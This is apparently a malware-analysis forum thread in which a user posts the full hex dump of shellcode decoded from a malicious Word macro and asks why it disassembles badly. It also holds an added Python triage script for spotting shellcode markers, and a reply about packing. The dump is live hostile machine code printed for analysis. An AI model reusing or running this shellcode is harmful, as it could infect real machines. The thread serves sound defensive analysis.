Malware Analysis: Need help analyzing this suspicious .doc file

yyangcs (Thread author), Mar 3, 2017
Hello,

Recently, I received this suspicious document
(can be downloaded at mal_doc.zip -- password: infected, if required)
but could not figure out how the embedded shellcode works. Here is what I have got so far:

Through debugging, the macro is trying to decode the following encoded string

[attached screenshot: 1.png]

The encoded string is stored in object 25

[attached screenshot: 2.png]

The decoding function can be found in the VBA macro 'irresolvedly'

[attached screenshot: 3.png]


and the decoded shellcode I got looks as follows:

8B0C244C03C64903D648895C242041FFD74883C72849FFCD75DB488B9D580500008B4328488D9530020000418D0C06898DE0020000498B4C2408FF55C0498B4C2408FF55D033C0488B9C24400600004881C400060000415F415E415D415C5F5E5DC3CCCCCCC20085C0750333C0C3B94D5A000066390875F38B483C03C88B012D50450000F7D81BC0F7D023C1C36BC0069983E20703C2C1F803C36BC006250700008079054883C8F840C38D48BF80F91977070FBEC083E841C38D489F80F91977070FBEC083E847C38D48D080F90977070FBEC083C004C33C2B75046A3E58C33C2F75046A3F58C333C0C38BD18A0933C084C97418568BF0C1E007C1EE180BF00FBEC133C6428A0A84C975EA5EC3558BEC5151535657C745F8CC020000C645FC00608B7D088A45FC8B4DF8F3AA615F5E5BC9C3558BEC51518B45088365FC008945F88A0084C07468535657E85BFFFFFF8BD88B45FCE834FFFFFF8B4DF88D14088B45FCE833FFFFFF8BF88BF0F7DE8D4E08B001D2E0FEC8F6D0200283FF037D098D4E02D2E3081AEB158D4FFE8BC3D3F88D4E0AD2E30802C6420100085A01FF45088B45088A00FF45FC84C0759E5F5E5BC9C38BC6E8AFFEFFFF85C07425B94C01000066394804751A8B487885C9741383787400760D85D274058B407C89028D0431C333C0C3558BEC515153568B7508578D55F8E8BAFFFFFF85C074448B70248B
78208B581C037508037D08035D08743085FF742C8B40148365FC008945F885C0741E8B45FC8B0C87034D08E8BBFEFFFF3B450C7412FF45FC8B45FC3B45F872E233C05F5E5BC9C38B45FC0FB704468B0483034508EBEC558BEC81ECA405000064A1300000008B400C8B401C8B40085356576819505BD550894590E866FFFFFF59596A6B8BF8586A656689855CFFFFFF586A726689855EFFFFFF586A6E66898560FFFFFF586A6566898562FFFFFF586A6C5E6A3366898564FFFFFF8BC666898566FFFFFF586A3266898568FFFFFF586A2E6689856AFFFFFF586A646689856CFFFFFF586689856EFFFFFF8BC666898570FFFFFF66898572FFFFFF33C066898574FFFFFF6A188D855CFFFFFF89459C586A3466894598586689459A8D45F4508D45985033DB5353FFD768C5C37414FF75F4E8B1FEFFFF59596A508945F0586A7366898578FFFFFF586A616689857AFFFFFF586689857CFFFFFF6A70586689857EFFFFFF6A6958668945806A2E58668945826A6458668945848BC66689458633C06689458A8D8578FFFFFF6689758889459C8D4802668B1083C002663BD375F52BC1D1F803C06A2866894598586689459A8D854CFFFFFF508D4598505353FFD768FB79AF42FFB54CFFFFFFE818FEFFFF68565665F7FF75F48BF0E809FEFFFF680FE7E82DFF75F48945ECE8F9FDFFFF83C4188945F8895DFCC745E42E646F63885DE8

However, when I tried to disassemble the code in Immunity:

[attached screenshot: 4.png]


Looks like something is wrong with the shellcode. Can anyone take a look at the file I attached and tell me what might be wrong? Thanks.
 
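As an added triage example (my own code, not something posted in this thread or taken from the attachment), the script below takes a pasted hex dump like the one above, turns it into bytes, and reports the markers an analyst checks before loading a blob into a disassembler: the 32-bit PEB access (mov eax, fs:[0x30]), x86 function prologues, the 'MZ' header compare, the REX-prefixed x64 register epilogue, int3 padding runs, push imm32 constants that sit directly before a call argument or call (candidate API hashes), and embedded ASCII and UTF-16 strings. One thing it makes visible for the dump above: it contains both the x86 prologue bytes 55 8B EC and the x64 epilogue bytes 41 5F 41 5E 41 5D 41 5C 5F 5E 5D C3, so a 32-bit debugger such as Immunity will misdecode the 64-bit portion. The signature table, the sample blob and all function names are assumptions I constructed for the example.

```python
"""Triage helper for a hex-encoded shellcode blob recovered from a VBA macro.

Added example: the signature table, sample blob and helper names are
constructed for illustration, not taken from the thread's attachment.
"""
import re
import struct
import sys
from typing import Dict, List

# Byte-level markers commonly seen in position-independent Windows shellcode.
SIGNATURES = {
    "x86_peb":      rb"\x64\xa1\x30\x00\x00\x00",          # mov eax, fs:[0x30]  (PEB)
    "x86_prologue": rb"\x55\x8b\xec",                      # push ebp; mov ebp, esp
    "x86_mz_check": rb"\xb9\x4d\x5a\x00\x00\x66\x39\x08",  # mov ecx, 'MZ'; cmp [eax], cx
    "x64_epilogue": rb"\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x5f\x5e\x5d\xc3",  # pop r15..rbp; ret
    "int3_run":     rb"\xcc{3,}",                          # int3 padding between functions
}
# push imm32 immediately followed by push [mem] (FF) or call (E8): typical API-hash argument.
PUSH_IMM_THEN_CALLARG = re.compile(rb"\x68(.{4})(?=[\xff\xe8])", re.DOTALL)
ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")
NOT_HEX = re.compile(r"[^0-9A-Fa-f]")


def hex_to_bytes(text: str) -> bytes:
    """Decode a pasted dump; whitespace and newlines are ignored, odd length is an error."""
    digits = NOT_HEX.sub("", text)
    if len(digits) % 2:
        raise ValueError(f"odd number of hex digits ({len(digits)}): dump truncated or mis-copied")
    return bytes.fromhex(digits)


def find_signatures(blob: bytes) -> Dict[str, List[int]]:
    """Return {tag: [offsets]} for every marker present in the blob."""
    hits: Dict[str, List[int]] = {}
    for tag, pattern in SIGNATURES.items():
        offsets = [m.start() for m in re.finditer(pattern, blob, re.DOTALL)]
        if offsets:
            hits[tag] = offsets
    return hits


def arch_hint(hits: Dict[str, List[int]]) -> str:
    """Summarise which instruction set the markers point to; 'x86+x64' means mixed code."""
    x86 = any(tag.startswith("x86_") for tag in hits)
    x64 = any(tag.startswith("x64_") for tag in hits)
    return {(True, True): "x86+x64", (True, False): "x86", (False, True): "x64"}.get((x86, x64), "unknown")


def push_immediates(blob: bytes) -> List[int]:
    """imm32 values pushed right before a push-from-memory or a call: candidate API hashes."""
    return [struct.unpack("<I", m.group(1))[0] for m in PUSH_IMM_THEN_CALLARG.finditer(blob)]


def ascii_strings(blob: bytes) -> List[str]:
    """Printable runs of 4+ bytes. Note that x64 pop sequences like 41 5F 41 5E look printable too."""
    return [m.group().decode("ascii") for m in ASCII_RUN.finditer(blob)]


def wide_strings(blob: bytes) -> List[str]:
    """UTF-16LE runs of 4+ characters (how shellcode often spells DLL names)."""
    return [m.group().decode("utf-16-le") for m in WIDE_RUN.finditer(blob)]


def triage(hex_text: str) -> dict:
    """Full report for one dump: size, architecture hint, marker offsets, constants, strings."""
    blob = hex_to_bytes(hex_text)
    hits = find_signatures(blob)
    return {
        "size": len(blob),
        "arch": arch_hint(hits),
        "signatures": hits,
        "push_imm32": [f"0x{v:08x}" for v in push_immediates(blob)],
        "ascii": ascii_strings(blob),
        "wide": wide_strings(blob),
    }


# Constructed sample (not the thread's shellcode): instruction sequences and strings
# stitched together so every detector has something to find. Offsets in comments.
SAMPLE_BLOB = (
    b"\x55\x8b\xec"                              # 0:  push ebp; mov ebp, esp
    b"\x64\xa1\x30\x00\x00\x00"                  # 3:  mov eax, fs:[0x30]
    b"\x8b\x40\x0c\x8b\x40\x1c\x8b\x40\x08"      # 9:  Ldr -> module list -> DllBase
    b"\xb9\x4d\x5a\x00\x00\x66\x39\x08"          # 18: mov ecx, 'MZ'; cmp [eax], cx
    b"\x68\xc5\xc3\x74\x14"                      # 26: push 0x1474c3c5
    b"\xff\x75\xf4"                              # 31: push [ebp-0xc]
    b"\xe8\xb1\xfe\xff\xff"                      # 34: call rel32
    b"kernel32.dll\x00"                          # 39: ASCII string
    b"\xcc\xcc\xcc\xcc"                          # 52: int3 padding
    b"u\x00s\x00e\x00r\x00\x00\x00"              # 56: UTF-16LE "user"
    b"\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x5f\x5e\x5d\xc3"  # 66: x64 epilogue
)
SAMPLE_HEX = SAMPLE_BLOB.hex().upper()  # same shape as the dump pasted in the thread

if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_HEX
    for key, value in triage(text).items():
        print(f"{key}: {value}")
```

Run it with the pasted dump saved to a text file as the first argument; with no argument it runs on the constructed sample. An odd digit count is reported as an error rather than silently truncated, which is the first thing to rule out when a disassembler shows nonsense. The "arch" field is the point of the example: when it says x86+x64, a 32-bit-only debugger will decode the REX-prefixed parts as unrelated short instructions, which matches the garbage listing described above.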

Winter Soldier (Verified), Feb 13, 2017
Probably the binary is masked through a packer.
But something is strange, because usually the macro starts a dropped executable file, or one downloaded from the Internet.
In this case, instead, it seems to use shellcode encoded in base-64 and integrated into the document code, which is decoded automatically by loading the malware's code, probably encrypted.

yyangcs (Thread author), Mar 3, 2017
Winter Soldier said:
    Probably the binary is masked through a packer.
    But something is strange, because usually the macro starts a dropped executable file, or one downloaded from the Internet.
    In this case, instead, it seems to use shellcode encoded in base-64 and integrated into the document code, which is decoded automatically by loading the malware's code, probably encrypted.

Yes. The shellcode is encoded, and the shellcode I posted is what I got after the decoding function "prodromus". I am just curious about how this shellcode could work, like dropping files or downloading files from the Internet.
 
